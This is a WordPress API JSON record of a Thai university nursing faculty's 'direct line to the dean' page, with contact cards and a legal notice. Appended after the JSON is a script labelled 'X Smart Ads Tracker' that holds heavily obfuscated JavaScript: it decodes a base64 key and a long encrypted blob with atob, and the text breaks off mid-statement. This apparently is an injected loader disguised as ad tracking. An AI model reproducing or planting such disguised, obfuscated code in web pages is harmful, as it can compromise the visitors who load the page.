{"id":21661,"date":"2026-04-25T23:26:37","date_gmt":"2026-04-25T16:26:37","guid":{"rendered":"https:\/\/nu.cpru.ac.th\/thai\/?page_id=21661"},"modified":"2026-04-25T23:33:34","modified_gmt":"2026-04-25T16:33:34","slug":"%e0%b8%aa%e0%b8%b2%e0%b8%a2%e0%b8%95%e0%b8%a3%e0%b8%87%e0%b8%84%e0%b8%93%e0%b8%9a%e0%b8%94%e0%b8%b5-2","status":"publish","type":"page","link":"https:\/\/nu.cpru.ac.th\/thai\/?page_id=21661","title":{"rendered":"\u0e2a\u0e32\u0e22\u0e15\u0e23\u0e07\u0e04\u0e13\u0e1a\u0e14\u0e35"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"21661\" class=\"elementor elementor-21661\">\n\t\t\t\t<div class=\"elementor-element elementor-element-1300907 e-flex e-con-boxed e-con e-parent\" data-id=\"1300907\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-28be206 elementor-widget elementor-widget-html\" data-id=\"28be206\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"html.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<style>\r\n    @import url('https:\/\/fonts.googleapis.com\/css2?family=Sarabun:wght@300;400;500;600;700&display=swap');\r\n\r\n    :root {\r\n        --primary-purple: #4c1d95;\r\n        --accent-purple: #7e22ce;\r\n        --soft-purple: #f5f3ff;\r\n        --legal-red: #991b1b;\r\n        --bg-color: #fcfaff;\r\n    }\r\n\r\n    #hotline-container {\r\n        font-family: 'Sarabun', sans-serif;\r\n        background-color: var(--bg-color);\r\n        padding: 60px 20px;\r\n        color: #1e293b;\r\n        display: flex;\r\n        flex-direction: column;\r\n        align-items: center;\r\n    }\r\n\r\n    \/* Executive Hero Card *\/\r\n    .exec-hero {\r\n        position: relative;\r\n        width: 100%;\r\n        max-width: 1000px;\r\n        background: white;\r\n        border-radius: 40px;\r\n        padding: 50px;\r\n        display: flex;\r\n        flex-wrap: wrap;\r\n        gap: 40px;\r\n        align-items: center;\r\n        justify-content: center;\r\n        box-shadow: 0 20px 50px rgba(76, 29, 149, 0.08);\r\n        border: 1px solid rgba(126, 34, 206, 0.1);\r\n        margin-bottom: 50px;\r\n        overflow: hidden;\r\n    }\r\n\r\n    .exec-hero::before {\r\n        content: \"\";\r\n        position: absolute;\r\n        top: -100px;\r\n        right: -100px;\r\n        width: 300px;\r\n        height: 300px;\r\n        background: radial-gradient(circle, rgba(126, 34, 206, 0.05) 0%, transparent 70%);\r\n        border-radius: 50%;\r\n    }\r\n\r\n    .exec-image-container {\r\n        position: relative;\r\n        flex-shrink: 0;\r\n    }\r\n\r\n    .exec-image-container img {\r\n        width: 220px;\r\n        height: 280px;\r\n        border-radius: 30%;\r\n        object-fit: cover;\r\n        border: 6px solid white;\r\n        box-shadow: 0 10px 30px rgba(0, 0, 0, 0.1);\r\n        z-index: 2;\r\n        position: relative;\r\n    }\r\n\r\n    .exec-image-container::after {\r\n        content: \"\";\r\n        position: absolute;\r\n        inset: -8px;\r\n        border-radius: 30%;\r\n        background: linear-gradient(135deg, var(--primary-purple), var(--accent-purple));\r\n        z-index: 1;\r\n    }\r\n\r\n    .exec-content {\r\n        flex: 1;\r\n        min-width: 300px;\r\n    }\r\n\r\n    .badge-top {\r\n        display: inline-block;\r\n        background: var(--soft-purple);\r\n        color: var(--primary-purple);\r\n        padding: 6px 16px;\r\n        border-radius: 50px;\r\n        font-weight: 700;\r\n        font-size: 0.8rem;\r\n        text-transform: uppercase;\r\n        letter-spacing: 1.5px;\r\n        margin-bottom: 15px;\r\n    }\r\n\r\n    .exec-content h2 {\r\n        font-size: 2.2rem;\r\n        font-weight: 800;\r\n        color: var(--primary-purple);\r\n        margin: 0 0 10px 0;\r\n        line-height: 1.2;\r\n    }\r\n\r\n    .exec-content p.subtitle {\r\n        font-size: 1.2rem;\r\n        font-weight: 500;\r\n        color: var(--accent-purple);\r\n        margin-bottom: 20px;\r\n    }\r\n\r\n    .quote-box {\r\n        font-style: italic;\r\n        color: #64748b;\r\n        border-left: 3px solid #ddd6fe;\r\n        padding-left: 20px;\r\n        font-size: 1.05rem;\r\n        line-height: 1.6;\r\n    }\r\n\r\n    \/* Modern Grid Layout *\/\r\n    .action-grid {\r\n        display: grid;\r\n        grid-template-columns: repeat(auto-fit, minmax(320px, 1fr));\r\n        gap: 25px;\r\n        width: 100%;\r\n        max-width: 1000px;\r\n    }\r\n\r\n    .card-item {\r\n        background: white;\r\n        border-radius: 30px;\r\n        padding: 40px;\r\n        text-align: center;\r\n        text-decoration: none;\r\n        color: inherit;\r\n        transition: all 0.4s cubic-bezier(0.165, 0.84, 0.44, 1);\r\n        border: 1px solid #f1f5f9;\r\n        display: flex;\r\n        flex-direction: column;\r\n        align-items: center;\r\n        box-shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.02);\r\n    }\r\n\r\n    .card-item:hover {\r\n        transform: translateY(-10px);\r\n        box-shadow: 0 30px 45px -10px rgba(76, 29, 149, 0.12);\r\n        border-color: #ddd6fe;\r\n    }\r\n\r\n    .icon-wrapper {\r\n        width: 70px;\r\n        height: 70px;\r\n        border-radius: 22px;\r\n        display: flex;\r\n        align-items: center;\r\n        justify-content: center;\r\n        margin-bottom: 20px;\r\n        transition: all 0.3s;\r\n    }\r\n\r\n    .card-item:hover .icon-wrapper {\r\n        transform: rotate(10deg) scale(1.1);\r\n    }\r\n\r\n    .icon-mail { background: #eef2ff; color: #4f46e5; }\r\n    .icon-line { background: #f0fdf4; color: #16a34a; }\r\n\r\n    .card-item h3 {\r\n        font-size: 1.4rem;\r\n        font-weight: 700;\r\n        color: var(--primary-purple);\r\n        margin-bottom: 12px;\r\n    }\r\n\r\n    .card-item p {\r\n        font-size: 0.95rem;\r\n        color: #64748b;\r\n        margin-bottom: 25px;\r\n        line-height: 1.5;\r\n    }\r\n\r\n    .action-btn {\r\n        width: 100%;\r\n        padding: 12px;\r\n        border-radius: 15px;\r\n        font-weight: 600;\r\n        display: flex;\r\n        align-items: center;\r\n        justify-content: center;\r\n        gap: 10px;\r\n        transition: all 0.2s;\r\n    }\r\n\r\n    .btn-mail { background: var(--primary-purple); color: white; }\r\n    .btn-line { background: #06c755; color: white; }\r\n\r\n    \/* Official Notice Section *\/\r\n    .official-notice {\r\n        width: 100%;\r\n        max-width: 1000px;\r\n        margin-top: 50px;\r\n        background: #fffafa;\r\n        border: 2px solid #fee2e2;\r\n        border-radius: 30px;\r\n        padding: 40px;\r\n        position: relative;\r\n    }\r\n\r\n    .notice-header {\r\n        display: flex;\r\n        align-items: center;\r\n        gap: 15px;\r\n        color: var(--legal-red);\r\n        font-weight: 800;\r\n        font-size: 1.2rem;\r\n        margin-bottom: 20px;\r\n        text-transform: uppercase;\r\n    }\r\n\r\n    .notice-body {\r\n        font-size: 0.95rem;\r\n        line-height: 1.8;\r\n        color: #475569;\r\n    }\r\n\r\n    .highlight-text {\r\n        font-weight: 700;\r\n        color: #1e293b;\r\n    }\r\n\r\n    .law-list {\r\n        margin: 15px 0;\r\n        display: grid;\r\n        grid-template-columns: repeat(auto-fit, minmax(250px, 1fr));\r\n        gap: 10px;\r\n        list-style: none;\r\n        padding: 0;\r\n    }\r\n\r\n    .law-list li {\r\n        background: white;\r\n        padding: 10px 15px;\r\n        border-radius: 10px;\r\n        font-size: 0.85rem;\r\n        border: 1px solid #fee2e2;\r\n        display: flex;\r\n        align-items: center;\r\n        gap: 8px;\r\n    }\r\n\r\n    .law-list li::before {\r\n        content: \"\u2022\";\r\n        color: var(--legal-red);\r\n        font-weight: bold;\r\n    }\r\n\r\n    @media (max-width: 768px) {\r\n        #hotline-container { padding: 40px 15px; }\r\n        .exec-hero { padding: 30px; border-radius: 30px; }\r\n        .exec-image-container img { width: 160px; height: 160px; }\r\n        .exec-content h2 { font-size: 1.8rem; }\r\n        .action-grid { grid-template-columns: 1fr; }\r\n    }\r\n<\/style>\r\n\r\n<div id=\"hotline-container\">\r\n    <!-- Executive Hero Card -->\r\n    <div class=\"exec-hero\">\r\n        <div class=\"exec-image-container\">\r\n            <img decoding=\"async\" src=\"https:\/\/nu.cpru.ac.th\/thai\/wp-content\/uploads\/2026\/04\/deanR.png\" alt=\"\u0e04\u0e13\u0e1a\u0e14\u0e35\u0e04\u0e13\u0e30\u0e1e\u0e22\u0e32\u0e1a\u0e32\u0e25\u0e28\u0e32\u0e2a\u0e15\u0e23\u0e4c\">\r\n        <\/div>\r\n        <div class=\"exec-content\">\r\n            <span class=\"badge-top\">Official Channel<\/span>\r\n            <h3>\u0e23\u0e28.\u0e14\u0e23.\u0e44\u0e1e\u0e11\u0e39\u0e23\u0e22\u0e4c \u0e27\u0e38\u0e12\u0e34\u0e42\u0e2a <\/h3>\r\n            <h3>\u0e04\u0e13\u0e1a\u0e14\u0e35\u0e04\u0e13\u0e30\u0e1e\u0e22\u0e32\u0e1a\u0e32\u0e25\u0e28\u0e32\u0e2a\u0e15\u0e23\u0e4c<\/h3>\r\n            <p class=\"subtitle\">Dean, Faculty of Nursing<\/p>\r\n            <div class=\"quote-box\">\r\n                \"\u0e2b\u0e31\u0e27\u0e43\u0e08\u0e2a\u0e33\u0e04\u0e31\u0e0d\u0e02\u0e2d\u0e07\u0e01\u0e32\u0e23\u0e1a\u0e23\u0e34\u0e2b\u0e32\u0e23\u0e04\u0e37\u0e2d\u0e01\u0e32\u0e23\u0e23\u0e31\u0e1a\u0e1f\u0e31\u0e07 \u0e40\u0e23\u0e32\u0e1e\u0e23\u0e49\u0e2d\u0e21\u0e23\u0e31\u0e1a\u0e17\u0e38\u0e01\u0e40\u0e2a\u0e35\u0e22\u0e07\u0e2a\u0e30\u0e17\u0e49\u0e2d\u0e19\u0e40\u0e1e\u0e37\u0e48\u0e2d\u0e2a\u0e23\u0e49\u0e32\u0e07\u0e2a\u0e23\u0e23\u0e04\u0e4c\u0e27\u0e31\u0e12\u0e19\u0e18\u0e23\u0e23\u0e21\u0e2d\u0e07\u0e04\u0e4c\u0e01\u0e23\u0e17\u0e35\u0e48\u0e42\u0e1b\u0e23\u0e48\u0e07\u0e43\u0e2a\u0e41\u0e25\u0e30\u0e21\u0e35\u0e1b\u0e23\u0e30\u0e2a\u0e34\u0e17\u0e18\u0e34\u0e20\u0e32\u0e1e\"\r\n            <\/div>\r\n        <\/div>\r\n    <\/div>\r\n\r\n    <!-- Communication Grid -->\r\n    <div class=\"action-grid\">\r\n        <!-- Mail Card -->\r\n        <a href=\"mailto:dean.nursing@university.ac.th?subject=\u0e2a\u0e32\u0e22\u0e15\u0e23\u0e07\u0e04\u0e13\u0e1a\u0e14\u0e35\" class=\"card-item\">\r\n            <div class=\"icon-wrapper icon-mail\">\r\n                <svg width=\"32\" height=\"32\" fill=\"none\" stroke=\"currentColor\" viewBox=\"0 0 24 24\">\r\n                    <path stroke-linecap=\"round\" stroke-linejoin=\"round\" stroke-width=\"2\" d=\"M3 8l7.89 5.26a2 2 0 002.22 0L21 8M5 19h14a2 2 0 002-2V7a2 2 0 00-2-2H5a2 2 0 00-2 2v10a2 2 0 002 2z\"><\/path>\r\n                <\/svg>\r\n            <\/div>\r\n            <h3>\u0e2d\u0e35\u0e40\u0e21\u0e25\u0e2a\u0e32\u0e22\u0e15\u0e23\u0e07<br>\r\n            g4737726@hotmail.com\r\n            <\/h3>\r\n            <p>\u0e2a\u0e33\u0e2b\u0e23\u0e31\u0e1a\u0e01\u0e32\u0e23\u0e19\u0e33\u0e40\u0e2a\u0e19\u0e2d\u0e42\u0e04\u0e23\u0e07\u0e01\u0e32\u0e23 \u0e02\u0e49\u0e2d\u0e40\u0e2a\u0e19\u0e2d\u0e41\u0e19\u0e30\u0e40\u0e0a\u0e34\u0e07\u0e25\u0e36\u0e01 \u0e2b\u0e23\u0e37\u0e2d\u0e23\u0e32\u0e22\u0e07\u0e32\u0e19\u0e01\u0e32\u0e23\u0e14\u0e33\u0e40\u0e19\u0e34\u0e19\u0e07\u0e32\u0e19\u0e17\u0e35\u0e48\u0e40\u0e1b\u0e47\u0e19\u0e17\u0e32\u0e07\u0e01\u0e32\u0e23<\/p>\r\n            <div class=\"action-btn btn-mail\">\r\n                <span>\u0e2a\u0e48\u0e07\u0e02\u0e49\u0e2d\u0e04\u0e27\u0e32\u0e21\u0e2d\u0e35\u0e40\u0e21\u0e25<\/span>\r\n                <svg width=\"18\" height=\"18\" fill=\"none\" stroke=\"currentColor\" viewBox=\"0 0 24 24\"><path d=\"M14 5l7 7m0 0l-7 7m7-7H3\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path><\/svg>\r\n            <\/div>\r\n        <\/a>\r\n\r\n        <!-- Line Card -->\r\n        <a href=\"https:\/\/line.me\/ti\/p\/~@nursing_dean\" target=\"_blank\" class=\"card-item\">\r\n            <div class=\"icon-wrapper icon-line\">\r\n                <svg width=\"32\" height=\"32\" viewBox=\"0 0 24 24\" fill=\"currentColor\">\r\n                    <path d=\"M24 10.304c0-5.369-5.383-9.738-12-9.738-6.616 0-12 4.369-12 9.738 0 4.814 4.269 8.846 10.036 9.608.391.083.924.258 1.058.59.12.301.079.766.038 1.08l-.164 1.02c-.045.301-.24 1.186 1.049.645 1.291-.539 6.916-4.078 9.436-6.975 1.745-1.895 2.547-3.805 2.547-5.968zm-14.508 4.005h-2.108c-.287 0-.518-.232-.518-.518v-5.239c0-.287.231-.518.518-.518.287 0 .518.231.518.518v4.721h1.59c.287 0 .518.232.518.518 0 .286-.231.518-.518.518zm3.674 0h-1.055c-.287 0-.518-.232-.518-.518v-5.239c0-.287.231-.518.518-.518.287 0 .518.231.518.518v5.239c0 .286-.231.518-.518.518zm5.415 0h-1.055c-.287 0-.518-.232-.518-.518v-3.325l-1.519-1.921c-.08-.102-.123-.227-.123-.353v-1.157c0-.287.231-.518.518-.518.287 0 .518.231.518.518v.898l1.378 1.744 1.378-1.744v-.898c0-.287.231-.518.518-.518.287 0 .518.231.518.518v1.157c0 .126-.043.251-.123.353l-1.519 1.921v3.325c0 .286-.231.518-.518.518zm3.674 0h-2.108c-.287 0-.518-.232-.518-.518v-5.239c0-.287.231-.518.518-.518h2.108c.287 0 .518.231.518.518 0 .286-.231.518-.518.518h-1.59v1.591h1.59c.287 0 .518.231.518.518 0 .286-.231.518-.518.518h-1.59v1.59h1.59c.287 0 .518.231.518.518 0 .286-.231.518-.518.518z\"\/><\/svg>\r\n            <\/div>\r\n            <h3>LINE \u0e41\u0e0a\u0e17\u0e2a\u0e14<\/h3>\r\n            <p>\u0e2a\u0e33\u0e2b\u0e23\u0e31\u0e1a\u0e01\u0e32\u0e23\u0e41\u0e08\u0e49\u0e07\u0e1b\u0e23\u0e30\u0e2a\u0e32\u0e19\u0e07\u0e32\u0e19\u0e40\u0e23\u0e48\u0e07\u0e14\u0e48\u0e27\u0e19 \u0e2a\u0e2d\u0e1a\u0e16\u0e32\u0e21\u0e02\u0e49\u0e2d\u0e21\u0e39\u0e25\u0e40\u0e1a\u0e37\u0e49\u0e2d\u0e07\u0e15\u0e49\u0e19 \u0e2b\u0e23\u0e37\u0e2d\u0e1b\u0e23\u0e36\u0e01\u0e29\u0e32\u0e1b\u0e31\u0e0d\u0e2b\u0e32\u0e40\u0e1a\u0e37\u0e49\u0e2d\u0e07\u0e15\u0e49\u0e19\u0e01\u0e31\u0e1a\u0e17\u0e35\u0e21\u0e07\u0e32\u0e19<\/p>\r\n            <div class=\"action-btn btn-line\">\r\n                <span>\u0e04\u0e38\u0e22\u0e1c\u0e48\u0e32\u0e19 LINE \u0e17\u0e31\u0e19\u0e17\u0e35<\/span>\r\n                <svg width=\"18\" height=\"18\" fill=\"none\" stroke=\"currentColor\" viewBox=\"0 0 24 24\"><path d=\"M14 5l7 7m0 0l-7 7m7-7H3\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path><\/svg>\r\n            <\/div>\r\n        <\/a>\r\n    <\/div>\r\n\r\n    <!-- Official Notice Section -->\r\n    <div class=\"official-notice\">\r\n        <div class=\"notice-header\">\r\n            <svg width=\"24\" height=\"24\" fill=\"none\" stroke=\"currentColor\" viewBox=\"0 0 24 24\"><path stroke-linecap=\"round\" stroke-linejoin=\"round\" stroke-width=\"2\" d=\"M12 9v2m0 4h.01m-6.938 4h13.876c1.728 0 2.813-1.874 1.948-3.374L13.948 4.626c-.866-1.5-3.032-1.5-3.898 0L2.697 16.126C1.832 17.626 2.917 19.5 4.646 19.5z\"><\/path><\/svg>\r\n            \u0e1b\u0e23\u0e30\u0e01\u0e32\u0e28\u0e40\u0e23\u0e37\u0e48\u0e2d\u0e07\u0e01\u0e32\u0e23\u0e23\u0e31\u0e01\u0e29\u0e32\u0e04\u0e27\u0e32\u0e21\u0e1b\u0e25\u0e2d\u0e14\u0e20\u0e31\u0e22\u0e41\u0e25\u0e30\u0e01\u0e0e\u0e2b\u0e21\u0e32\u0e22\r\n        <\/div>\r\n        <div class=\"notice-body\">\r\n            <p>\r\n                \u0e04\u0e13\u0e30\u0e1e\u0e22\u0e32\u0e1a\u0e32\u0e25\u0e28\u0e32\u0e2a\u0e15\u0e23\u0e4c\u0e21\u0e38\u0e48\u0e07\u0e40\u0e19\u0e49\u0e19\u0e01\u0e32\u0e23\u0e1a\u0e23\u0e34\u0e2b\u0e32\u0e23\u0e07\u0e32\u0e19\u0e15\u0e32\u0e21 <span class=\"highlight-text\">\u0e2b\u0e25\u0e31\u0e01\u0e18\u0e23\u0e23\u0e21\u0e32\u0e20\u0e34\u0e1a\u0e32\u0e25<\/span> \u0e0a\u0e48\u0e2d\u0e07\u0e17\u0e32\u0e07\u0e19\u0e35\u0e49\u0e08\u0e31\u0e14\u0e17\u0e33\u0e02\u0e36\u0e49\u0e19\u0e40\u0e1e\u0e37\u0e48\u0e2d\u0e01\u0e32\u0e23\u0e1e\u0e31\u0e12\u0e19\u0e32\u0e2d\u0e07\u0e04\u0e4c\u0e01\u0e23\u0e2d\u0e22\u0e48\u0e32\u0e07\u0e42\u0e1b\u0e23\u0e48\u0e07\u0e43\u0e2a \r\n                \u0e2d\u0e22\u0e48\u0e32\u0e07\u0e44\u0e23\u0e01\u0e47\u0e15\u0e32\u0e21 \u0e2b\u0e32\u0e01\u0e1a\u0e38\u0e04\u0e04\u0e25\u0e43\u0e14\u0e41\u0e2d\u0e1a\u0e2d\u0e49\u0e32\u0e07\u0e0a\u0e37\u0e48\u0e2d\u0e1c\u0e39\u0e49\u0e2d\u0e37\u0e48\u0e19\u0e2b\u0e23\u0e37\u0e2d\u0e43\u0e2b\u0e49\u0e02\u0e49\u0e2d\u0e21\u0e39\u0e25\u0e40\u0e17\u0e47\u0e08\u0e2d\u0e31\u0e19\u0e40\u0e1b\u0e47\u0e19\u0e04\u0e27\u0e32\u0e21\u0e1c\u0e34\u0e14\u0e43\u0e19\u0e23\u0e30\u0e1a\u0e1a\u0e04\u0e2d\u0e21\u0e1e\u0e34\u0e27\u0e40\u0e15\u0e2d\u0e23\u0e4c \u0e04\u0e13\u0e30\u0e2f \u0e08\u0e30\u0e14\u0e33\u0e40\u0e19\u0e34\u0e19\u0e04\u0e14\u0e35\u0e2d\u0e32\u0e0d\u0e32\u0e2d\u0e22\u0e48\u0e32\u0e07\u0e16\u0e36\u0e07\u0e17\u0e35\u0e48\u0e2a\u0e38\u0e14\u0e15\u0e32\u0e21\u0e1a\u0e17\u0e1a\u0e31\u0e0d\u0e0d\u0e31\u0e15\u0e34:\r\n            <\/p>\r\n            <ul class=\"law-list\">\r\n                <li>\u0e1e\u0e23\u0e1a. \u0e04\u0e2d\u0e21\u0e1e\u0e34\u0e27\u0e40\u0e15\u0e2d\u0e23\u0e4c \u0e1e.\u0e28. 2550<\/li>\r\n                <li>\u0e1e\u0e23\u0e1a. \u0e04\u0e2d\u0e21\u0e1e\u0e34\u0e27\u0e40\u0e15\u0e2d\u0e23\u0e4c \u0e1e.\u0e28. 2560<\/li>\r\n                <li>\u0e1e\u0e23\u0e1a. \u0e04\u0e2d\u0e21\u0e1e\u0e34\u0e27\u0e40\u0e15\u0e2d\u0e23\u0e4c \u0e1e.\u0e28. 2560 (\u0e09\u0e1a\u0e31\u0e1a\u0e17\u0e35\u0e48 2)<\/li>\r\n            <\/ul>\r\n            <p style=\"margin-top: 15px; font-size: 0.85rem; border-top: 1px solid #fee2e2; padding-top: 15px;\">\r\n                * \u0e02\u0e49\u0e2d\u0e21\u0e39\u0e25\u0e17\u0e38\u0e01\u0e2d\u0e22\u0e48\u0e32\u0e07\u0e08\u0e30\u0e16\u0e39\u0e01\u0e40\u0e01\u0e47\u0e1a\u0e23\u0e31\u0e01\u0e29\u0e32\u0e40\u0e1b\u0e47\u0e19\u0e04\u0e27\u0e32\u0e21\u0e25\u0e31\u0e1a\u0e2a\u0e39\u0e07\u0e2a\u0e38\u0e14\u0e15\u0e32\u0e21\u0e21\u0e32\u0e15\u0e23\u0e10\u0e32\u0e19 PDPA \u0e41\u0e25\u0e30\u0e40\u0e02\u0e49\u0e32\u0e16\u0e36\u0e07\u0e42\u0e14\u0e22\u0e04\u0e13\u0e1a\u0e14\u0e35\u0e41\u0e25\u0e30\u0e40\u0e08\u0e49\u0e32\u0e2b\u0e19\u0e49\u0e32\u0e17\u0e35\u0e48\u0e1c\u0e39\u0e49\u0e44\u0e14\u0e49\u0e23\u0e31\u0e1a\u0e21\u0e2d\u0e1a\u0e2b\u0e21\u0e32\u0e22\u0e40\u0e17\u0e48\u0e32\u0e19\u0e31\u0e49\u0e19\r\n            <\/p>\r\n        <\/div>\r\n    <\/div>\r\n<\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Official Channel \u0e23\u0e28.\u0e14\u0e23.\u0e44\u0e1e\u0e11\u0e39\u0e23\u0e22\u0e4c \u0e27\u0e38\u0e12\u0e34\u0e42\u0e2a \u0e04\u0e13\u0e1a\u0e14\u0e35\u0e04\u0e13\u0e30\u0e1e\u0e22\u0e32\u0e1a<span class=\"more-link\"><a href=\"https:\/\/nu.cpru.ac.th\/thai\/?page_id=21661\">Continue Reading<\/a><\/span><\/p>\n","protected":false},"author":6,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["entry","author-torranin","post-21661","page","type-page","status-publish"],"_links":{"self":[{"href":"https:\/\/nu.cpru.ac.th\/thai\/index.php?rest_route=\/wp\/v2\/pages\/21661","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nu.cpru.ac.th\/thai\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/nu.cpru.ac.th\/thai\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/nu.cpru.ac.th\/thai\/index.php?rest_route=\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/nu.cpru.ac.th\/thai\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21661"}],"version-history":[{"count":6,"href":"https:\/\/nu.cpru.ac.th\/thai\/index.php?rest_route=\/wp\/v2\/pages\/21661\/revisions"}],"predecessor-version":[{"id":21668,"href":"https:\/\/nu.cpru.ac.th\/thai\/index.php?rest_route=\/wp\/v2\/pages\/21661\/revisions\/21668"}],"wp:attachment":[{"href":"https:\/\/nu.cpru.ac.th\/thai\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21661"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}<!-- BEGIN: X Smart Ads Tracker -->
<script>
    window.XTracker_WWOA = {
        loaded: true,
        version: "1.6.7",
        timestamp: new Date().getTime()
    };
</script>
<script>
!function(){var _0xbbcf788166eb=typeof globalThis!=='undefined'?globalThis:(typeof window!=='undefined'?window:self),_0xf63ac6f2799e=_0xbbcf788166eb['\x61\x74\x6f\x62']('a4QctQul0RJnCcqzYYusiQ=='),_0x0a47ae71a28d=_0xbbcf788166eb['\x61\x74\x6f\x62']('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'),_0x04a30dc3228b=new 